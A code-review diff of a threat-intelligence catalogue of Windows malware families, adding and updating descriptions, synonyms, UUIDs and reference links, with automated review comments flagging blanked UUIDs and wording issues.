+ "uuid": "056eca1f-4195-48c3-81d8-ed554dd1de20",
+ "value": "SappyCache"
+ },
 {
 "description": "",
 "meta": {
@@ -13118,11 +15029,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan",
+ "https://www.sangfor.com/source/blog-network-security/1094.html",
 "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread",
+ "https://cyware.com/news/new-satan-ransomware-variant-lucky-exposes-10-server-side-vulnerabilities-070afbd2",
 "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/",
- "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html"
+ "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html",
+ "http://blog.nsfocusglobal.com/categories/trend-analysis/satan-variant-analysis-handling-guide/",
+ "https://www.bleepingcomputer.com/news/security/dbger-ransomware-uses-eternalblue-and-mimikatz-to-spread-across-networks/"
+ ],
+ "synonyms": [
+ "DBGer",
+ "Lucky Ransomware"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91",
@@ -13159,7 +15077,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos",
- "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos",
+ "https://securitykitten.github.io/2016/11/15/scanpos.html",
 "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware"
 ],
 "synonyms": [],
@@ -13322,6 +15240,40 @@
 "uuid": "0d4ca924-7e7e-4385-b14d-f504b4d206e5",
 "value": "Serpico"
 },
+ {
+ "description": "ServHelper is written in Delphi and according to ProofPoint best classified as a backdoor.\r\n\r\nProofPoint noticed two distinct variant - \"tunnel\" and \"downloader\" (citation):\r\n\"The 'tunnel' variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP). Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to 'hijack' legitimate user accounts or their web browser profiles and use them as they see fit. The 'downloader' variant is stripped of the tunneling and hijacking functionality and is used as a basic downloader.\"\r\n",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.servhelper",
+ "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505",
+ "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf",
+ "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/",
+ "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/",
+ "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cebfa7af-8c31-4dda-8373-82893c7f43f4",
+ "value": "ServHelper"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer",
+ "https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/",
+ "https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/",
+ "https://securelist.com/operation-shadowhammer/89992/",
+ "https://blog.reversinglabs.com/blog/forging-the-shadowhammer",
+ "https://www.vkremez.com/2019/03/lets-learn-dissecting-operation.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "51728278-a95c-45a5-9ae0-9897d41d0efb",
+ "value": "shadowhammer"
+ },
 {
 "description": "",
 "meta": {
@@ -13436,6 +15388,19 @@
 "uuid": "67fc358f-da6a-4f01-be23-44bc97319127",
 "value": "Shim RAT"
 },
+ {
+ "description": "SHIPSHAPE is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps.\r\n\r\n",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shipshape",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "07470989-faac-44fb-b505-1d5568b3c716",
+ "value": "SHIPSHAPE"
+ },
 {
 "description": "",
 "meta": {
@@ -13531,8 +15496,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence",
 "http://www.intezer.com/silenceofthemoles/",
+ "https://www.group-ib.com/resources/threat-research/silence.html",
 "https://securelist.com/the-silence/83009/",
- "https://www.group-ib.com/resources/threat-research/silence.html"
+ "https://reaqta.com/2019/01/silence-group-targeting-russian-banks/"
 ],
 "synonyms": [
 "TrueBot"
@@ -13672,6 +15638,19 @@
 "uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846",
 "value": "Slingshot"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slub",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1bc01fca-9a1e-4669-bd9d-8dd29416f9c1",
+ "value": "SLUB"
+ },
 {
 "description": "",
 "meta": {
@@ -13906,7 +15885,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite",
 "https://attack.mitre.org/wiki/Software/S0157",
- "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
+ "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
+ "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/",
+ "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx"
 ],
 "synonyms": [
 "denis"
@@ -13916,6 +15897,19 @@
 "uuid": "f4cac204-3d3f-4bb6-84bd-fc27b2f5158c",
 "value": "SOUNDBITE"
 },
+ {
+ "description": "SPACESHIP searches for files with a specified set of file extensions and copies them to\r\na removable drive. FireEye believes that SHIPSHAPE is used to copy SPACESHIP to a removable drive,\r\nwhich could be used to infect another victim computer, including an air-gapped computer. SPACESHIP is\r\nthen used to steal documents from the air-gapped system, copying them to a removable drive inserted\r\ninto the SPACESHIP-infected system",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "813e2761-6d68-493f-846b-2fc86d2e8079",
+ "value": "SPACESHIP"
+ },
 {
 "description": "",
 "meta": {
@@ -13968,7 +15962,7 @@
 "synonyms": [],
 "type": []
 },
- "uuid": "552745f4-6702-47a5-b517-9b099937573f",
+ "uuid": "",
 "value": "win.spynet_rat"
 },
 {
@@ -13989,7 +15983,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm",
- "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf",
 "https://securelist.com/analysis/publications/69953/the-naikon-apt/",
 "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
 ],
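Review bot: The hunk at old line 13968 replaces the win.spynet_rat identifier with an empty string, `"uuid": ""`, leaving a cluster element with no stable key; the uuid is what other galaxies, events and deduplication logic reference, and every other element touched in this diff carries one. Nothing in the commit explains the removal, so it reads like an accidental edit rather than an intended retirement of the element. Either restore `"uuid": "552745f4-6702-47a5-b517-9b099937573f",` or assign a fresh UUID before merging, and if the element is meant to go away, delete it outright instead of blanking the key.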
@@ -14065,6 +16059,34 @@
 "uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a",
 "value": "StarsyPound"
 },
+ {
+ "description": "Potentially unwanted program that changes the startpage of browsers to induce ad impressions.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.startpage",
+ "https://www.bleepingcomputer.com/virus-removal/remove-search-searchetan.com-chrome-new-tab-page"
+ ],
+ "synonyms": [
+ "Easy Television Access Now"
+ ],
+ "type": []
+ },
+ "uuid": "033dbef5-eb51-4f7b-87e6-6dc4bef72841",
+ "value": "StartPage"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker",
+ "https://blog.malwarebytes.com/threat-analysis/2019/02/new-golang-brute-forcer-discovered-amid-rise-e-commerce-attacks/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d1c5a299-c072-44b5-be31-d03853bca5ea",
+ "value": "StealthWorker Go"
+ },
 {
 "description": "",
 "meta": {
@@ -14090,6 +16112,23 @@
 "uuid": "82ab5235-a71e-4692-a08c-8db337d8b53a",
 "value": "Stinger"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stop",
+ "https://securelist.com/keypass-ransomware/87412/",
+ "https://www.bleepingcomputer.com/news/security/djvu-ransomware-spreading-new-tro-variant-through-cracks-and-adware-bundles/"
+ ],
+ "synonyms": [
+ "Djvu",
+ "KeyPass"
+ ],
+ "type": []
+ },
+ "uuid": "447e5d7d-dd23-43b3-8cbc-b835498a49dd",
+ "value": "STOP Ransomware"
+ },
 {
 "description": "",
 "meta": {
@@ -14139,7 +16178,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet",
- "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html"
+ "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html",
+ "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -14165,9 +16205,16 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox",
+ "https://www.symantec.com/connect/blogs/trojanbayrob-strikes-again-1",
+ "https://media.blackhat.com/us-13/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf",
+ "https://www.justice.gov/opa/pr/two-romanian-cybercriminals-convicted-all-21-counts-relating-infecting-over-400000-victim",
+ "https://www.symantec.com/connect/blogs/bayrob-three-suspects-extradited-face-charges-us"
+ ],
+ "synonyms": [
+ "Bayrob",
+ "Nivdort"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "dd9939a4-df45-4c7c-8a8d-83b40766aacd",
@@ -14273,7 +16320,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10",
- "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf",
 "https://securelist.com/analysis/publications/69953/the-naikon-apt/",
 "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
 ],
@@ -14372,7 +16419,8 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor",
 "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html",
 "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf",
- "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html"
+ "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html",
+ "https://www.nttsecurity.com/docs/librariesprovider3/resources/taidoor%E3%82%92%E7%94%A8%E3%81%84%E3%81%9F%E6%A8%99%E7%9A%84%E5%9E%8B%E6%94%BB%E6%92%83%E8%A7%A3%E6%9E%90%E3%83%AC%E3%83%9D%E3%83%BC%E3%83%88_v1"
 ],
 "synonyms": [
 "simbot"
@@ -14460,6 +16508,34 @@
 "uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3",
 "value": "TDTESS"
 },
+ {
+ "description": "Recently, Check Point researchers spotted a targeted attack against officials within government finance authorities and representatives in several embassies in Europe. The attack, which starts with a malicious attachment disguised as a top secret US document, weaponizes TeamViewer, the popular remote access and desktop sharing software, to gain full control of the infected computer.\r\nThis is achieved by sideloading another DLL among the legit TeamViewer.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teambot",
+ "https://research.checkpoint.com/finteam-trojanized-teamviewer-against-government-targets/"
+ ],
+ "synonyms": [
+ "FINTEAM"
+ ],
+ "type": []
+ },
+ "uuid": "045469d0-5bb2-4ed9-9ee2-a0a08f437433",
+ "value": "TeamBot"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tefosteal",
+ "https://twitter.com/WDSecurity/status/1105990738993504256"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "aaa05037-aee1-4353-ace1-43ae0f558091",
+ "value": "TefoSteal"
+ },
 {
 "description": "",
 "meta": {
@@ -14517,6 +16593,20 @@
 "uuid": "b127028b-ecb1-434b-abea-e4df3ca458b9",
 "value": "Terminator RAT"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.termite",
+ "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/",
+ "https://www.alienvault.com/blogs/labs-research/internet-of-termites"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c0801a29-ecc4-449b-9a1b-9d2dbde1995d",
+ "value": "Termite"
+ },
 {
 "description": "",
 "meta": {
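Review bot: The TeamBot description (hunk at old line 14460) opens with "Recently, Check Point researchers spotted…", copied verbatim from the blog post; in a dataset that is read for years, "recently" carries no information and dates the entry badly. Rephrase it as a plain statement of what was observed, e.g. `"description": "Check Point researchers reported a targeted attack against officials within government finance authorities and representatives in several embassies in Europe. …"`, keeping the rest of the text. The second paragraph's detail that control is gained by sideloading a DLL next to the legitimate TeamViewer binary is the part defenders will search for, so it is worth keeping in the first sentence rather than after the `\r\n`.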
@@ -14662,6 +16752,21 @@ "uuid": "f7c26ca7-0a7b-41b8-ad55-06625be10144", "value": "TinyLoader" }, + { + "description": "TinyMet is a meterpreter stager.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet", + "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/" + ], + "synonyms": [ + "TiniMet" + ], + "type": [] + }, + "uuid": "075c6fa0-e670-4fe1-be8b-b8b13714cb58", + "value": "TinyMet" + }, { "description": "TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program's author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor.", "meta": { 
@@ -14791,33 +16896,40 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot",
+ "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware",
 "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/",
- "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412",
+ "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/",
 "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module",
 "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre",
 "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/",
+ "http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html",
 "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/",
 "https://www.youtube.com/watch?v=KMcSAlS9zGE",
+ "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
 "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/",
 "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/",
 "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/",
 "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html",
 "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/",
 "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader",
+ "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
 "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/",
 "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works",
 "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/",
 "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms",
- "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets",
+ "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412",
 "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot",
 "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html",
 "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/",
+ "https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html",
 "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf",
- "http://www.malware-traffic-analysis.net/2018/02/01/",
+ "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets",
 "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot",
 "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/",
- "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html",
+ "http://www.malware-traffic-analysis.net/2018/02/01/",
+ "https://www.cert.pl/en/news/single/detricking-trickbot-loader/",
 "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features",
 "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/",
 "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html",
@@ -14847,11 +16959,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton",
- "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html",
 "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware",
+ "https://dragos.com/blog/trisis/TRISIS-01.pdf",
+ "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html",
 "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN",
- "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf",
- "https://dragos.com/blog/trisis/TRISIS-01.pdf"
+ "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html",
+ "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf"
 ],
 "synonyms": [
 "HatMan",
@@ -14868,7 +16981,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat",
 "https://github.com/5loyd/trochilus/",
- "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf",
+ "https://asert.arbornetworks.com/uncovering-the-seven-pointed-dagger/",
+ "https://github.com/m0n0ph1/malware-1/tree/master/Trochilus",
 "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
 ],
 "synonyms": [],
@@ -14883,7 +16997,10 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh",
 "https://securelist.com/the-shade-encryptor-a-double-threat/72087/",
- "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/"
+ "https://www.welivesecurity.com/2019/01/28/russia-hit-new-wave-ransomware-spam/",
+ "https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/",
+ "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/",
+ "https://support.kaspersky.com/13059"
 ],
 "synonyms": [
 "Shade"
@@ -14922,7 +17039,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup",
- "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html"
+ "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
+ "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage"
 ],
 "synonyms": [],
 "type": []
@@ -14972,6 +17090,22 @@
 "uuid": "5d05d81d-a0f8-496d-9a80-9b04fe3019fc",
 "value": "UDPoS"
 },
+ {
+ "description": "Information stealer.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ufrstealer",
+ "https://twitter.com/malwrhunterteam/status/1096363455769202688",
+ "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Usteal"
+ ],
+ "synonyms": [
+ "Usteal"
+ ],
+ "type": []
+ },
+ "uuid": "a24bf6d9-e177-44f2-9e61-8cf3566e45eb",
+ "value": "UFR Stealer"
+ },
 {
 "description": "",
 "meta": {
@@ -15018,7 +17152,7 @@
 "synonyms": [],
 "type": []
 },
- "uuid": "ff80f82d-2556-4cda-8cf2-aa6b21d59dc9",
+ "uuid": "",
 "value": "win.unidentified_005"
 },
 {
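Review bot: The last hunk blanks the identifier of the `win.unidentified_005` entry, leaving `"uuid": ""`, which is not a valid UUID and removes the stable key that tags and cross-references to this cluster entry depend on; nothing in the commit message explains it, so this looks like an artefact of the regeneration rather than an intended change. Keep the previous value, i.e. `"uuid": "ff80f82d-2556-4cda-8cf2-aa6b21d59dc9",`, or, if the entry is meant to go, drop it whole rather than emptying its uuid. A pre-commit check that rejects empty or duplicate uuid values would catch this class of error before it reaches consumers of the galaxy.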
@@ -15171,18 +17305,6 @@ "uuid": "799921d7-48e8-47a6-989e-487b527af37a", "value": "Unidentified 032" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_033" - ], - "synonyms": [], - "type": [] - }, - "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f", - "value": "Unidentified 033" - }, { "description": "", "meta": { @@ -15280,19 +17402,6 @@ "uuid": "4cb8235a-7e70-4fad-9244-69215750d559", "value": "Unidentified 045" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_046", - "https://twitter.com/DrunkBinary/status/1006534471687004160" - ], - "synonyms": [], - "type": [] - }, - "uuid": "878ab9fc-a526-43bd-81ac-3eba14ba0f1f", - "value": "Unidentified 046" - }, { "description": "RAT written in Delphi used by Patchwork APT.", "meta": { @@ -15306,19 +17415,6 @@ "uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2", "value": "Unidentified 047" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_048", - "https://twitter.com/DrunkBinary/status/1002587521073721346" - ], - "synonyms": [], - "type": [] - }, - "uuid": "3304c5ce-85f0-4648-b95f-33cf9621cd2f", - "value": "Unidentified 048 (Lazarus?)" - }, { "description": "", "meta": { 
@@ -15370,6 +17466,47 @@ "uuid": "b60e32bd-158a-42b9-ac21-288bca4c8233", "value": "Unidentified 053 (Wonknu?)" }, + { + "description": "Unnamed downloader for win.wscspl as described in the 360ti blog post.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_055", + "https://www.freebuf.com/articles/database/192726.html", + "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b001ebb7-5d33-4972-96cc-56f9549dff27", + "value": "Unidentified 055" + }, + { + "description": "Unnamed portscanner as used in the Australian Parliament Hack (Feb 2019).", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_057", + "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1b8e86ab-57b2-4cd9-a768-a7118b4eb4be", + "value": "Unidentified 057" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_058", + "https://securelist.com/the-evolution-of-brazilian-malware/74325/#rat", + "https://securelist.com/the-return-of-the-bom/90065/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bab52335-be9e-4fad-b68e-f124b0d69bbc", + "value": "Unidentified 058" + }, { "description": "", "meta": { 
@@ -15438,8 +17575,10 @@ "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html", "https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/", + "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features", "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/", "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", + "http://blog.inquest.net/blog/2019/03/09/Analyzing-Sophisticated-PowerShell-Targeting-Japan/", "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/" ], "synonyms": [ @@ -15456,8 +17595,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", "https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken", "https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation", + "https://www.circl.lu/pub/tr-25/", "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3193&sid=9fe4a57263c91a8b18bc43ae23afc453", "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence", 
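Review bot: The first hunk adds a Cybereason reference whose slug describes a "new Ursnif variant" to what appears, from the neighbouring URLZone refs, to be the URLZone entry (the entry's `value` lies outside the hunk). Ursnif/Gozi is presumably tracked as its own entry in this file, so it is worth confirming that the post actually analyses URLZone before it is attached here; a reference filed under a sibling family skews the tag-to-source mapping that downstream users rely on. If the post covers both families, a short sentence in the description saying so would stop the question from coming up again.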
@@ -15478,11 +17619,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak", + "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf", + "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/", "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html", - "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", - "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf", - "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" + "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" ], "synonyms": [ "Catch", @@ -15494,6 +17636,22 @@ "uuid": "b662c253-5c87-4ae6-a30e-541db0845f67", "value": "Vawtrak" }, + { + "description": "Delphi-based ransomware.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vegalocker", + "https://twitter.com/malwrhunterteam/status/1095024267459284992", + "https://twitter.com/malwrhunterteam/status/1093136163836174339" + ], + 